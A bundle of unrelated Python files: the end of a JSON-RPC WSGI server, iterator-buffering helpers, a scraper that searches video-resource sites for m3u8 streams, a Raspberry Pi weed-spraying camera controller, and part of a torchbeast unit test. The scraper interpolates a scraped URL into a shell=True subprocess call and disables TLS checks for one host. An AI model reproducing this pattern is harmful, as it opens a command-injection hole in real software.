                                'Authentication required for ' +
                                'imramboContigFilter ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception as e:
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())

        # print('Request method was %s\n' % environ['REQUEST_METHOD'])
        # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
        # print('Request body was: %s' % request_body)
        # print('Result from the method call is:\n%s\n' % \
        #    pprint.pformat(rpc_result))

        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''

        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body.encode('utf8')]

    def process_error(self, error, context, request, trace=None):
        # Attach id/version and the stack trace in whichever slot matches the
        # request's JSON-RPC version, log the trace, and serialize the error.
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)

    def now_in_utc(self):
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)

application = Application()

# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass

_proc = None


def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Excecution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True.
This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print("Listening on port %s" % port) if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = 
token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as err: # print help information and exit: print(str(err)) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print("Host set to %s" % host) else: assert False, "unhandled option" start_server(host=host, port=port) # print("Listening on port %s" % port) # httpd = make_server( host, port, application) # # httpd.serve_forever()
buffering.py
"""Wrapper functions to make iterators buffered. """ import multiprocessing as mp import threading import traceback import Queue def buffered_gen_mp(source_gen, buffer_size=2): """ Generator that runs a slow source generator in a separate process. buffer_size: the maximal number of items to pre-generate (length of the buffer) """ if buffer_size < 2: raise RuntimeError("Minimal buffer size is 2!") buffer = mp.Queue(maxsize=buffer_size - 1) # the effective buffer size is one less, because the generation process # will generate one extra element and block until there is room in the buffer. def _buffered_generation_process(source_gen, buffer): try: for data in source_gen: buffer.put(data, block=True) finally: print "putting None" buffer.put(None) # sentinel: signal the end of the iterator buffer.close() # unfortunately this does not suffice as a signal: if buffer.get() # was called and subsequently the buffer is closed, it will block forever. process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer)) process.start() for data in iter(buffer.get, None): yield data def buffered_gen_threaded(source_gen, buffer_size=2): """ Generator that runs a slow source generator in a separate thread. Beware of the GIL! buffer_size: the maximal number of items to pre-generate (length of the buffer) """ if buffer_size < 2: raise RuntimeError("Minimal buffer size is 2!") buffer = Queue.Queue(maxsize=buffer_size - 1) # the effective buffer size is one less, because the generation process # will generate one extra element and block until there is room in the buffer. def _buffered_generation_thread(source_gen, buffer): try: for data in source_gen: buffer.put(data, block=True) except: traceback.print_exc() import sys sys.exit(1) finally: buffer.put(None) # sentinel: signal the end of the iterator thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer)) thread.daemon = True thread.start() for data in iter(buffer.get, None): yield data
search.py
# Searches a list of video-resource ("zy") sites for a keyword, collects
# playable m3u8 pages per title, then hands the chosen URL to download.py.
import re
import time
import subprocess
import threading

import requests
from lxml import html
import urllib3
urllib3.disable_warnings()

# NOTE(review): this first domain_list is dead code — it is immediately
# overwritten by the reassignment below.
domain_list = [
    "http://kubozy.net/",
    "http://zy.kakazycj.com/",
    "http://www.kubozy.org/",
    "http://zycaiji.com/",
    "http://www.zxziyuan.com/",
    "http://api.kbzyapi.com/",
    "http://www.kuyunzyw.tv/",
    "http://www.kuyun.co/",
    "http://superpan.me/",
    "http://www.gxzyw.net/",
    "http://www.yongjiuzy1.com/",
    "http://www.yongjiuzy2.com/",
    "http://www.yongjiuzy3.com/",
    "http://www.yongjiuzy4.com/",
    "http://www.yongjiuzy5.com/",
    "http://yongjiuzy.vip/",
    "http://135zy0.com/",
    "http://www.okzyw.com/",
    "http://okzy.co/",
    "http://www.haozy.cc/",
    "http://www.okzyw.net/",
    "http://www.apiokzy.com/",
    "http://www.okp2pzy.com/",
    "http://zy.yswy.top/",
    "http://www.okokzy.net/",
    "http://www.okzyw.cc/",
    "https://okzy8.com/",
    "http://haku77.com/",
    "http://www.okzy10.com/",
    "http://www.okzy5.com/",
    "http://okzy1.com/",
    "http://www.zuidazy5.com/",
    "http://www.zuidazy1.com/",
    "http://135zy1.com/",
    "http://cj.135zy.co/",
    # "http://kuyunzy1.com/",
    # "http://www.kuyunzyw.vip/",
    # "http://kuyun9.com/",
    # "http://www.kuyunzy1.com/",
    # "http://ys1.xingyaox.com/",
    # "http://vip.xiaoheizaixian.com/",
    # "http://61166.net",
    # "http://www.btdytt8.net",
    # "http://www.panmanman.com/",
    # "https://xqzxwz.com/",
    # "http://v.hyage.com/",
]

# active list of sites to query
domain_list = [
    "https://wolongzy.net/",
    "http://zy.bajieziyuan.com/",
    "http://www.mahuazy.net/",
    "http://zuidazy.net/",
    "http://www.156zy.cc/",
    # "http://kuyunzy.cc/",
    "http://www.haozy.cc/",
    "http://www.765zy.com/",
    # "http://www.kukuzy.com/",
    # "http://www.1977zy.com/",
    "http://zuikzy.cc/",
    "http://www.123ku.com/",
    "http://kankanzy.com/",
    "http://www.doubanzy.com/",
    "http://gaoqingzy.com/",
    "http://zuidazy2.com/",
    "http://www.subo8988.com/",
    "http://www.leduozy.com/",
    "http://yongjiuzy.cc/",
    "http://www.ziyuanpian.net/",
    "http://www.666zy.com/",
    "https://www.baiwanzy.com/",
    "http://www.wuxiou.com/",
    "http://www.bbkdj.com/",
    "http://niuniuzy.com/",
    # "http://www.398zy.com/",
    "http://www.czhiziyuan.com/",
    "http://kubozy.net/",
    # "http://chaojizy.com/",
    "https://www.mb700.com/",
    "http://www.zuixinzy.cc/",
    "https://www.solezy.com/",
    "https://mokazy.com/",
    "http://265zy.cc/",
    # "http://www.88zyw.net/",
    # "http://www.mp4ba.cc/",
    # "http://www.agenya.cn/",
    "http://zy.ataoju.com/",
    "http://zy.itono.cn/",
    # "https://zy.nmbaojie.com/",
    # "http://www.ttzy.cc/",
    # "http://www.ckzy.cc/",
    "http://www.156zy.me/",
]

# for d in domain_list:
#     _ = requests.get(d).url
#     if _ != d:
#         print(d, _)
#     else:
#         print(d, True)
# input()

# prompt for a search keyword; falls back to a default when blank
print("Keyword: ", end="")
keyword = input()
if keyword == "":
    # keyword = "女皇之刃"
    keyword = "猫娘乐园"

error_list = []    # domains that failed to respond (shared across threads)
result_list = {}   # title_key -> list of detail-page URLs (shared across threads)
ps = []            # worker threads
# cap concurrent requests at 16
sema = threading.Semaphore(value=2**4)
for _i, domain in enumerate(domain_list):
    # one worker per domain: POST the search form, scrape result rows,
    # verify the first m3u8 link is reachable, then record the page URL.
    # NOTE(review): bare except/raise Exception is used as control flow here;
    # all failures are silently swallowed by the outer `except: pass`.
    def job(_i, domain):
        try:
            sema.acquire()
            start = time.time()
            # if domain != "http://kankanzy.com/":
            #     continue
            url = domain+"index.php?m=vod-search"
            data = {
                "wd": keyword,
                "submit": "search"
            }
            try:
                r = requests.post(url, data)
            except:
                error_list.append(domain)
                raise Exception
            if r.status_code == 404:
                error_list.append(domain)
                raise Exception
            r = r.content.decode()
            # print(url, data, r)
            # input()
            r = html.fromstring(r)
            # first/last <ul> are header/footer rows — skip them
            result = r.xpath("//div[@class='xing_vb']/ul")[1:-1]
            if len(result) == 0:
                raise Exception
            # print(domain+"\t\t"+str(len(result)))
            for r in result:
                # title = r.xpath(".//span[@class='xing_vb4']/a/text()")[0].strip()
                url = r.xpath(".//span[@class='xing_vb4']/a/@href")[0]
                url = domain+url
                url = url.replace("//?", "/?")
                # fetch the detail page to extract title and m3u8 links
                r = requests.get(url).content.decode()
                title = re.search(r"<h2>(.*?)<\/h2>", r)[1]
                title = re.sub(r"<.*?>", "", title)
                m3u8s = re.findall(r"\"(http.*?m3u8)\"", r)
                try:
                    verify = True
                    # this host has a broken TLS cert — skip verification
                    if "s1.jxtvsb.com" in m3u8s[0]:
                        # print(m3u8s[0])
                        verify = False
                    check = requests.get(m3u8s[0], verify=verify).status_code
                except:
                    check = 404
                if check != 200:
                    # print(title+"\t\t"+str(check), url)
                    continue
                # group results by title + episode count
                title_key = title+f"[{len(m3u8s)}]"
                if title_key not in result_list:
                    result_list[title_key] = []
                result_list[title_key].append(url)
                # print("\t"+title+"\t\t"+url)
            # print()
            print(f"\rProgress: {_i+1}/{len(domain_list)}\n", end="", flush=True)
        except:
            pass
        finally:
            sema.release()
    p = threading.Thread(target=job, args=(_i, domain))
    ps.append(p)
    p.start()
for p in ps:
    p.join()
print()
# for k, v in result_list.items():
#     print(k, v)
# print("error_list", error_list)

# show the collected titles and let the user pick one or more
for _i, k in enumerate(result_list.keys()):
    print(f"{_i+1}: {k}", result_list[k])
print("\nEnter Choice: ", end="")
choices = input().split()
# print(choices)
urls = []
for choice in choices:
    k = list(result_list.keys())[int(choice)-1]
    urls += result_list[k]
    # print(result_list[k])
# NOTE(review): only the first URL is downloaded even if several were chosen
cmd = f'download.py "{urls[0]}"'
# print(cmd)
subprocess.run(cmd, shell=True)
greenonbrown.py
#!/home/pi/.virtualenvs/owl/bin/python3
from algorithms import exg, exg_standardised, exg_standardised_hue, hsv, exgr, gndvi, maxg
from button_inputs import Selector, Recorder
from image_sampler import image_sample
from imutils.video import VideoStream, FileVideoStream, FPS
from relay_control import Controller
from queue import Queue
from time import strftime
import subprocess
import imutils
import shutil
import numpy as np
import time
import sys
import cv2
import os


def nothing(x):
    # no-op callback required by cv2.createTrackbar
    pass


def green_on_brown(image, exgMin=30, exgMax=250, hueMin=30, hueMax=90, brightnessMin=5, brightnessMax=200,
                   saturationMin=30, saturationMax=255, minArea=1, headless=True, algorithm='exg'):
    '''
    Uses a provided algorithm and contour detection to determine green objects in the image. Min and Max
    thresholds are provided.
    :param image: input image to be analysed
    :param exgMin: minimum ExG value kept when thresholding a non-binary algorithm output
    :param exgMax: ExG values above this are zeroed when thresholding
    :param hueMin: minimum hue passed to the HSV-based algorithms
    :param hueMax: maximum hue passed to the HSV-based algorithms
    :param brightnessMin: minimum brightness (HSV value channel) for HSV-based algorithms
    :param brightnessMax: maximum brightness (HSV value channel) for HSV-based algorithms
    :param saturationMin: minimum saturation for HSV-based algorithms
    :param saturationMax: maximum saturation for HSV-based algorithms
    :param minArea: minimum area for the detection - used to filter out small detections
    :param headless: True: no windows display; False: watch what the algorithm does
    :param algorithm: the algorithm to use. Defaults to ExG if not correct
    :return: returns the contours, bounding boxes, centroids and the image on which the boxes have been drawn
    '''
    # different algorithm options, add in your algorithm here if you make a new one!
    # threshedAlready flags algorithms (currently only 'hsv') that return a
    # binary mask directly, skipping the adaptive-threshold step below.
    threshedAlready = False
    if algorithm == 'exg':
        output = exg(image)

    elif algorithm == 'exgr':
        output = exgr(image)

    elif algorithm == 'maxg':
        output = maxg(image)

    elif algorithm == 'nexg':
        output = exg_standardised(image)

    elif algorithm == 'exhsv':
        output = exg_standardised_hue(image, hueMin=hueMin, hueMax=hueMax,
                                      brightnessMin=brightnessMin, brightnessMax=brightnessMax,
                                      saturationMin=saturationMin, saturationMax=saturationMax)

    elif algorithm == 'hsv':
        output, threshedAlready = hsv(image, hueMin=hueMin, hueMax=hueMax,
                                      brightnessMin=brightnessMin, brightnessMax=brightnessMax,
                                      saturationMin=saturationMin, saturationMax=saturationMax)

    elif algorithm == 'gndvi':
        output = gndvi(image)

    else:
        output = exg(image)
        print('[WARNING] DEFAULTED TO EXG')

    if not headless:
        cv2.imshow("Threshold", output)

    # run the thresholds provided
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))

    # if not a binary image, run an adaptive threshold on the area that fits within the thresholded bounds.
    if not threshedAlready:
        # zero everything outside (exgMin, exgMax]
        output = np.where(output > exgMin, output, 0)
        output = np.where(output > exgMax, 0, output)
        output = np.uint8(np.abs(output))
        if not headless:
            cv2.imshow("post", output)

        thresholdOut = cv2.adaptiveThreshold(output, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 2)
        thresholdOut = cv2.morphologyEx(thresholdOut, cv2.MORPH_CLOSE, kernel, iterations=1)

    # if already binary, run morphological operations to remove any noise
    if threshedAlready:
        thresholdOut = cv2.morphologyEx(output, cv2.MORPH_CLOSE, kernel, iterations=5)

    if not headless:
        cv2.imshow("Threshold", thresholdOut)

    # find all the contours on the binary images
    cnts = cv2.findContours(thresholdOut.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnts = imutils.grab_contours(cnts)
    weedCenters = []
    boxes = []

    # loop over all the detected contours and calculate the centres and bounding boxes
    for c in cnts:
        # filter based on total area of contour
        if cv2.contourArea(c) > minArea:
            # calculate the min bounding box
            startX, startY, boxW, boxH = cv2.boundingRect(c)
            endX = startX + boxW
            endY = startY + boxH
            # draw the detection onto the input image in red
            cv2.rectangle(image, (int(startX), int(startY)), (endX, endY), (0, 0, 255), 2)
            # save the bounding box
            boxes.append([startX, startY, boxW, boxH])
            # compute box center
            centerX = int(startX + (boxW / 2))
            centerY = int(startY + (boxH / 2))
            weedCenters.append([centerX, centerY])

    # returns the contours, bounding boxes, centroids and the image on which the boxes have been drawn
    return cnts, boxes, weedCenters, image


# the
class Owl:
    # Main controller: reads camera frames, runs green-on-brown detection,
    # and drives the spray nozzles via the relay Controller.
    def __init__(self, video=False, videoFile=None, recording=False, nozzleNum=4,
                 headless=True, exgMin=30, exgMax=180, hueMin=30, hueMax=92,
                 brightnessMin=5, brightnessMax=200, saturationMin=30, saturationMax=255,
                 resolution=(832, 624), framerate=32):
        # different detection parameters
        self.headless = headless
        self.recording = recording
        self.resolution = resolution
        self.framerate = framerate

        # threshold parameters for different algorithms
        self.exgMin = exgMin
        self.exgMax = exgMax
        self.hueMin = hueMin
        self.hueMax = hueMax
        self.saturationMin = saturationMin
        self.saturationMax = saturationMax
        self.brightnessMin = brightnessMin
        self.brightnessMax = brightnessMax

        # setup the track bars if headless is False
        if not self.headless:
            # create trackbars for the threshold calculation
            cv2.namedWindow("Params")
            cv2.createTrackbar("thresholdMin", "Params", self.exgMin, 255, nothing)
            cv2.createTrackbar("thresholdMax", "Params", self.exgMax, 255, nothing)

        # instantiate the recorder if recording is True
        if self.recording:
            self.fourcc = cv2.VideoWriter_fourcc(*'MJPG')
            self.writer = None
        else:
            self.record = False
            self.saveRecording = False

        # check if test video or videostream from camera
        if video:
            self.cam = FileVideoStream(videoFile).start()
        # if no video, start the camera with the provided parameters
        else:
            try:
                self.cam = VideoStream(usePiCamera=True,
                                       resolution=self.resolution,
                                       framerate=self.framerate).start()
            except ModuleNotFoundError:
                # not on a Pi — fall back to the default webcam
                self.cam = VideoStream(src=0).start()
        # give the camera time to warm up
        time.sleep(1.0)

        # set the sprayqueue size
        self.sprayQueue = Queue(maxsize=10)

        # nozzleDict maps the reference nozzle number to a boardpin on the embedded device
        self.nozzleDict = {
            0: 13,
            1: 15,
            2: 16,
            3: 18
        }

        ### Data collection only ###
        # algorithmDict maps pins to algorithms for data collection
        self.algorithmDict = {
            "exg": 29,
            "nexg": 31,
            "hsv": 33,
            "exhsv": 35,
        }
        # this is where the recording button can be added. Currently set to pin 37
        if self.recording:
            self.recorderButton = Recorder(recordGPIO=37)
        ############################

        # instantiate the nozzle controller - successful start should beep the buzzer
        self.controller = Controller(nozzleDict=self.nozzleDict)

        # instantiate the logger
        self.logger = self.controller.logger

        # sensitivity and weed size to be added
        self.sensitivity = None
        self.laneCoords = {}

        # add the total number of nozzles. This can be changed easily, but the nozzleDict and physical relays would need
        # to be updated too. Fairly straightforward, so an opportunity for more precise application
        self.nozzleNum = nozzleNum

    def hoot(self, sprayDur, delay, sample=False, sampleDim=400, saveDir='output',
             camera_name='cam1', algorithm='exg', selectorEnabled=False, minArea=10):
        # Main detection/spraying loop. Runs until the stream ends, ESC is
        # pressed (non-headless), or KeyboardInterrupt.
        # track FPS and framecount
        fps = FPS().start()

        if selectorEnabled:
            self.selector = Selector(switchDict=self.algorithmDict)

        try:
            while True:
                delay = self.update_delay(delay)
                frame = self.cam.read()

                if selectorEnabled:
                    algorithm, newAlgorithm = self.selector.algorithm_selector(algorithm)
                    if newAlgorithm:
                        self.logger.log_line('[NEW ALGO] {}'.format(algorithm))

                if self.recording:
                    self.record = self.recorderButton.record
                    self.saveRecording = self.recorderButton.saveRecording

                if frame is None:
                    # end of stream (e.g. test video finished)
                    fps.stop()
                    print("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()))
                    self.stop()
                    break

                # lazily create the video writer when recording starts
                if self.record and self.writer is None:
                    saveDir = os.path.join(saveDir, strftime("%Y%m%d-{}-{}".format(camera_name, algorithm)))
                    if not os.path.exists(saveDir):
                        os.makedirs(saveDir)

                    self.baseName = os.path.join(saveDir, strftime("%Y%m%d-%H%M%S-{}-{}".format(camera_name, algorithm)))
                    videoName = self.baseName + '.avi'
                    self.logger.new_video_logfile(name=self.baseName + '.txt')
                    self.writer = cv2.VideoWriter(videoName, self.fourcc, 30, (frame.shape[1], frame.shape[0]), True)

                # retrieve the trackbar positions for thresholds
                if not self.headless:
                    self.exgMin = cv2.getTrackbarPos("thresholdMin", "Params")
                    self.exgMax = cv2.getTrackbarPos("thresholdMax", "Params")
                else:
                    # this leaves it open to adding dials for sensitivity. Static at the moment, but could be dynamic
                    self.update(exgMin=self.exgMin, exgMax=self.exgMax)  # add in update values here

                # pass image, thresholds to green_on_brown function
                cnts, boxes, weedCentres, imageOut = green_on_brown(frame.copy(), exgMin=self.exgMin,
                                                                    exgMax=self.exgMax,
                                                                    hueMin=self.hueMin,
                                                                    hueMax=self.hueMax,
                                                                    saturationMin=self.saturationMin,
                                                                    saturationMax=self.saturationMax,
                                                                    brightnessMin=self.brightnessMin,
                                                                    brightnessMax=self.brightnessMax,
                                                                    headless=self.headless,
                                                                    algorithm=algorithm, minArea=minArea)

                ##### IMAGE SAMPLER #####
                # record sample images if required of weeds detected
                # uncomment if needed
                # if frameCount % 60 == 0 and sample is True:
                #     saveFrame = frame.copy()
                #     sampleThread = Thread(target=image_sample, args=[saveFrame, weedCentres, saveDir, sampleDim])
                #     sampleThread.start()
                #########################

                # activation region limit - once weed crosses this line, nozzle is activated
                self.yAct = int((0.2) * frame.shape[0])
                laneWidth = imageOut.shape[1] / self.nozzleNum

                # calculate lane coords and draw on frame
                for i in range(self.nozzleNum):
                    laneX = int(i * laneWidth)
                    # cv2.line(displayFrame, (laneX, 0), (laneX, imageOut.shape[0]), (0, 255, 255), 2)
                    self.laneCoords[i] = laneX

                # loop over the ID/weed centres from contours
                for ID, centre in enumerate(weedCentres):
                    # if they are in activation region the spray them
                    if centre[1] > self.yAct:
                        sprayTime = time.time()
                        for i in range(self.nozzleNum):
                            # determine which lane needs to be activated
                            if int(self.laneCoords[i]) <= centre[0] < int(self.laneCoords[i] + laneWidth):
                                # log a spray job with the controller using the nozzle, delay, timestamp and spray duration
                                # if GPS is used/speed control, delay can be updated automatically based on forward speed
                                self.controller.receive(nozzle=i, delay=delay, timeStamp=sprayTime, duration=sprayDur)

                # update the framerate counter
                fps.update()

                if not self.headless:
                    cv2.imshow("Output", imutils.resize(imageOut, width=600))

                if self.record and not self.saveRecording:
                    self.writer.write(frame)

                # recording button released: finalize the current video file
                if self.saveRecording and not self.record:
                    self.writer.release()
                    self.controller.solenoid.beep(duration=0.1)
                    self.recorderButton.saveRecording = False
                    fps.stop()
                    self.writer = None
                    self.logger.log_line_video("[INFO] {}. Approximate FPS: {:.2f}".format(self.baseName, fps.fps()), verbose=True)
                    fps = FPS().start()

                k = cv2.waitKey(1) & 0xFF
                if k == 27:
                    # ESC pressed — shut down cleanly
                    fps.stop()
                    self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True)
                    self.stop()
                    break

        except KeyboardInterrupt:
            fps.stop()
            self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True)
            self.stop()

        except Exception as e:
            # any unexpected error: beep loudly and log, leaving hardware in a known state
            self.controller.solenoid.beep(duration=0.5, repeats=5)
            self.logger.log_line("[CRITICAL ERROR] STOPPED: {}".format(e))

    # still in development
    def update_software(self):
        # Archive the current /home/pi/owl install and copy a new 'owl'
        # directory from a connected USB drive.
        USBDir, USBConnected = check_for_usb()
        if USBConnected:
            files = os.listdir(USBDir)
            workingDir = '/home/pi'

            # move old version to version control directory first
            oldVersionDir = strftime(workingDir + "/%Y%m%d-%H%M%S_update")
            os.mkdir(oldVersionDir)

            currentDir = '/home/pi/owl'
            shutil.move(currentDir, oldVersionDir)

            # move new directory to working directory
            for item in files:
                if 'owl' in item:
                    # NOTE(review): shutil.move() is called without arguments —
                    # this is incomplete and will raise TypeError if reached.
                    shutil.move()

    def stop(self):
        # Shut everything down: relays off, camera stopped, windows closed,
        # then exit the process.
        self.controller.running = False
        self.controller.solenoid.all_off()
        self.controller.solenoid.beep(duration=0.1)
        self.controller.solenoid.beep(duration=0.1)
        self.cam.stop()
        if self.record:
            self.writer.release()
            self.recorderButton.running = False
        if not self.headless:
            cv2.destroyAllWindows()
        sys.exit()

    def update(self, exgMin=30, exgMax=180):
        # refresh the detection thresholds (hook point for dynamic sensitivity)
        self.exgMin = exgMin
        self.exgMax = exgMax

    def update_delay(self, delay=0):
        # if GPS added, could use it here to return a delay variable based on speed.
        return delay


def check_for_usb():
    """Return (saveDir, usb_connected): the first mounted USB path under
    /media/pi if one exists, otherwise a local fallback directory."""
    try:
        nanoMediaFolder = 'ls /media/pi'
        proc = subprocess.Popen(nanoMediaFolder, shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE)
        usbName = proc.stdout.readline().rstrip().decode('utf-8')

        if len(usbName) > 0:
            print('[INFO] Saving to {} usb'.format(usbName))
            saveDir = '/media/pi/{}/'.format(usbName)
            return saveDir, True
        else:
            print('[INFO] No USB connected. Saving to videos')
            saveDir = '/home/pi/owl/videos'
            return saveDir, False

    except AttributeError:
        # os.setsid is unavailable on Windows
        print('[INFO] Windows computer detected...')
        saveDir = '/videos/'
        return saveDir, False


# business end of things
if __name__ == "__main__":
    owl = Owl(video=False,
              videoFile=r'',
              headless=True,
              recording=False,
              exgMin=25,
              exgMax=200,
              hueMin=39,
              hueMax=83,
              saturationMin=50,
              saturationMax=220,
              brightnessMin=60,
              brightnessMax=190,
              framerate=32,
              resolution=(416, 320))

    # start the targeting!
    owl.hoot(sprayDur=0.15,
             delay=0,
             sample=False,
             sampleDim=1000,
             saveDir='/home/pi',
             algorithm='exhsv',
             selectorEnabled=False,
             camera_name='hsv',
             minArea=10)
core_agent_state_test.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test that the core state is handled correctly by the batching mechanism."""

import unittest
import threading
import subprocess

import torch
from torch import nn

from libtorchbeast import actorpool


class Net(nn.Module):
    # Minimal "agent": its core state counts the number of forward steps,
    # resetting (via the notdone mask) whenever the environment is done.
    def __init__(self):
        super(Net, self).__init__()

    def initial_state(self):
        # core state is a single scalar wrapped as a (1, 1) tensor
        return torch.zeros(1, 1)

    def forward(self, inputs, core_state):
        x = inputs["frame"]
        # notdone is 0.0 where the episode ended, 1.0 otherwise
        notdone = (~inputs["done"]).float()

        T, B, *_ = x.shape

        # step through the unroll: zero the state on done, then increment
        for nd in notdone.unbind():
            # NOTE(review): the result of nd.view(1, -1) is discarded — this
            # line is a no-op as written; presumably `nd = nd.view(1, -1)`
            # was intended.
            nd.view(1, -1)
            core_state = nd * core_state
            core_state = core_state + 1

        # Arbitrarily return action 1.
        action = torch.ones((T, B), dtype=torch.int32)
        return (action,), core_state


class CoreAgentStateTest(unittest.TestCase):
    def setUp(self):
        # Launch the test environment server as a subprocess; it serves the
        # unix socket the ActorPool connects to.
        self.server_proc = subprocess.Popen(["python", "tests/core_agent_state_env.py"])

        self.B = 2
        self.T = 3
        self.model = Net()

        server_address = ["unix:/tmp/core_agent_state_test"]

        self.learner_queue = actorpool.BatchingQueue(
            batch_dim=1,
            minimum_batch_size=self.B,
            maximum_batch_size=self.B,
            check_inputs=True,
        )
        self.inference_batcher = actorpool.DynamicBatcher(
            batch_dim=1,
            minimum_batch_size=1,
            maximum_batch_size=1,
            timeout_ms=100,
            check_outputs=True,
        )
        self.actor = actorpool.ActorPool(
            unroll_length=self.T,
            learner_queue=self.learner_queue,
            inference_batcher=self.inference_batcher,
            env_server_addresses=server_address,
            initial_agent_state=self.model.initial_state(),
        )

    def inference(self):
        # Serve inference requests until the batcher is closed by learn().
        for batch in self.inference_batcher:
            batched_env_outputs, agent_state = batch.get_inputs()
            frame, _, done, *_ = batched_env_outputs
            # Check that when done is set we reset the environment.
            # Since we only have one actor producing experience we will always
            # have batch_size == 1, hence we can safely use item().
            if done.item():
                self.assertEqual(frame.item(), 0.0)
